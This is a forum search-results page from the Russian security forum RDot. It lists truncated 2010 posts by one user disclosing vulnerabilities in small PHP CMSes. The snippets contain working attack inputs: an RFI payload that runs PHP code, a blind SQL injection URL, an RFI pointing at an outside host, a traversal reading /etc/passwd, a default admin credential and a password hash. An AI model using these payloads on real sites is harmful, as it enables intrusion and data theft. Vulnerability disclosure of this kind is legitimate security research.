Вернуться   RDot > Поиск по форуму

Показано с 1 по 18 из 18.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: Atra Pluvia
Раздел: Обратная связь/Feedback 08.01.2011, 12:38
Ответов: 490
Просмотров: 301,608
Автор Atra Pluvia
Нет, не станут. Пруф...

Нет, не станут.

Пруф (https://rdot.org/forum/view_reputation.php?userid=8&page=2)
Раздел: Сценарии/CMF/СMS 20.11.2010, 20:22
Ответов: 7
Просмотров: 5,055
Автор Atra Pluvia
Danneo CMS

Danneo CMS
Version: 0.53(stable)
Download: http://danneo.com/down/open/CMS_Danneo_0_5_3.html

В движке все переданные переменные делаются глобальными и прогоняются через функцию stripslashes().
...
Раздел: Криптография/Cryptography 22.09.2010, 16:16
Ответов: 482
Просмотров: 276,717
Автор Atra Pluvia
vbulletin 8b2025f6b9fc80c9c19b50114e7f75e5:/L1

vbulletin
8b2025f6b9fc80c9c19b50114e7f75e5:/L1
Раздел: Оффтоп/Offtopic 17.09.2010, 10:26
Ответов: 29
Просмотров: 14,455
Автор Atra Pluvia
У тебя там в некоторых файлах, например,...

У тебя там в некоторых файлах, например, includes/promo.php , RFI при rg==on.


<?php
require_once ($inc_dir."header.php");
...

Самое элементарное, это
inc_dir=data:, <?php phpinfo();?>
,...
Раздел: Сценарии/CMF/СMS 10.09.2010, 14:45
Ответов: 3
Просмотров: 4,401
Автор Atra Pluvia
WebSkill CMS

WebSkill CMS
http://www.webskill.org/
Сайты можно найти в портфолио.

Логин:пароль по дефолту(даже на официальном сайте такие же)
r00t_xvost:123

SQL-injection(mq==off):

Эксплуатация:
Раздел: Сценарии/CMF/СMS 06.09.2010, 21:26
Ответов: 3
Просмотров: 6,636
Автор Atra Pluvia
Energine CMS

Energine CMS
Version: 2.3.8

Нужно, что бы был включен "список сотрудников".

Blind sql-injection(-):

Эксплуатация:
http://energine/ru/staff/2=(2)and(substring(version(),1,1))=(5)/
если...
Раздел: Сценарии/CMF/СMS 05.09.2010, 16:00
Ответов: 0
Просмотров: 2,773
Автор Atra Pluvia
Wap-Engine

Wap-Engine 5.0 Beta
Download: http://wap-engine.ru/modules/zagruz/index.php?kat=./0-wap-engine&file=wap-engine_5.0_beta.zip&view=1

PHP-injection(-):

Нужно зарегистрировать аккаунт.

Уязвимый...
Раздел: Сценарии/CMF/СMS 02.08.2010, 12:35
Ответов: 0
Просмотров: 2,566
Автор Atra Pluvia
portfoliocms

portfoliocms
Download: http://sourceforge.net/projects/portfoliocms/

RFI(-) || SQL-инъекция(mq==off):


$page = $_GET['page'];

...
Раздел: Сценарии/CMF/СMS 02.08.2010, 11:09
Ответов: 1
Просмотров: 5,354
Автор Atra Pluvia
What Is Real!? CMS

What Is Real!? CMS v0.9.0.x (01.08.10)
Download: https://sourceforge.net/projects/wir-cms/)
Site: http://www.whatisreal.com/

SQL-инъекция(mq==off && аккаунт):

Уязвимость присутствует в файле...
Раздел: Сценарии/CMF/СMS 31.07.2010, 16:23
Ответов: 0
Просмотров: 2,818
Автор Atra Pluvia
MFiCMS

MFiCMS vRC, RC2
Download: http://sourceforge.net/projects/mficms/


SQL-injection(mq==off):

Уязвимый файл:
./page/index.html

Код:
Раздел: Сценарии/CMF/СMS 21.07.2010, 12:06
Ответов: 1
Просмотров: 5,664
Автор Atra Pluvia
File upload(-): Уязвимый файл: ...

File upload(-):

Уязвимый файл:
./admin/upload-ajax.php

Код:


...
if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
Раздел: Сценарии/CMF/СMS 12.07.2010, 12:05
Ответов: 1
Просмотров: 4,139
Автор Atra Pluvia
Уязвимости SMS-Partners

SMS-Partners v3.10
Download: http://www.sendspace.com/file/gipion

SQL-injection(mq==off && blind):

Разработчики решили фильтровать некоторые переменные, а именно $_POST['email'], $_POST['icq']...
Раздел: Сценарии/CMF/СMS 08.07.2010, 21:41
Ответов: 2
Просмотров: 3,810
Автор Atra Pluvia
NooMS

NooMS 1.1.1
Download: http://sourceforge.net/projects/nooms/

SQL-инъекция(включенные комментарии):

Уязвимый файл:
./index.php
Раздел: Сценарии/CMF/СMS 07.07.2010, 15:54
Ответов: 0
Просмотров: 4,679
Автор Atra Pluvia
ULCms

ULCms V1.0
Download: http://code.google.com/p/ulcms/

LFI(rg==on):

Уязвимый файл:
./template/template.php

Код:
Раздел: Сценарии/CMF/СMS 07.07.2010, 15:53
Ответов: 0
Просмотров: 4,449
Автор Atra Pluvia
SnSCMS

SnSCMS v1.1
Download: http://code.google.com/p/snscms/

Читалка(win-платформа && mq==off):

Уязвимый файл:
./function.php

Код:
Раздел: Сценарии/CMF/СMS 07.07.2010, 15:18
Ответов: 0
Просмотров: 3,565
Автор Atra Pluvia
DEV Web Management System

DEV Web Management System v1.5
Download: http://sourceforge.net/projects/dev-wms/

SQL-инъекция(mq==off):

Уязвимый файл:
./getfile.php

Код:
Раздел: Сценарии/CMF/СMS 07.07.2010, 14:59
Ответов: 0
Просмотров: 4,402
Автор Atra Pluvia
Fowl CMS

Fowl CMS v1.1.1
Download: http://sourceforge.net/project/fowlcms/

LFI(mq==off && регистрация):

Уязвимый файл:
./index.php


if(isset($_COOKIE['User_ID'], $_COOKIE['PW']) AND
Раздел: Сценарии/CMF/СMS 07.07.2010, 13:25
Ответов: 3
Просмотров: 7,528
Автор Atra Pluvia
RFI(register globals = On): ...

RFI(register globals = On):
../forum/adminLogin.php?config[forum_installed]=http://site/index.php%00
../forum/userLogin.php?config[forum_installed]=../../../../../../../../../etc/passwd%00
...
Показано с 1 по 18 из 18.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot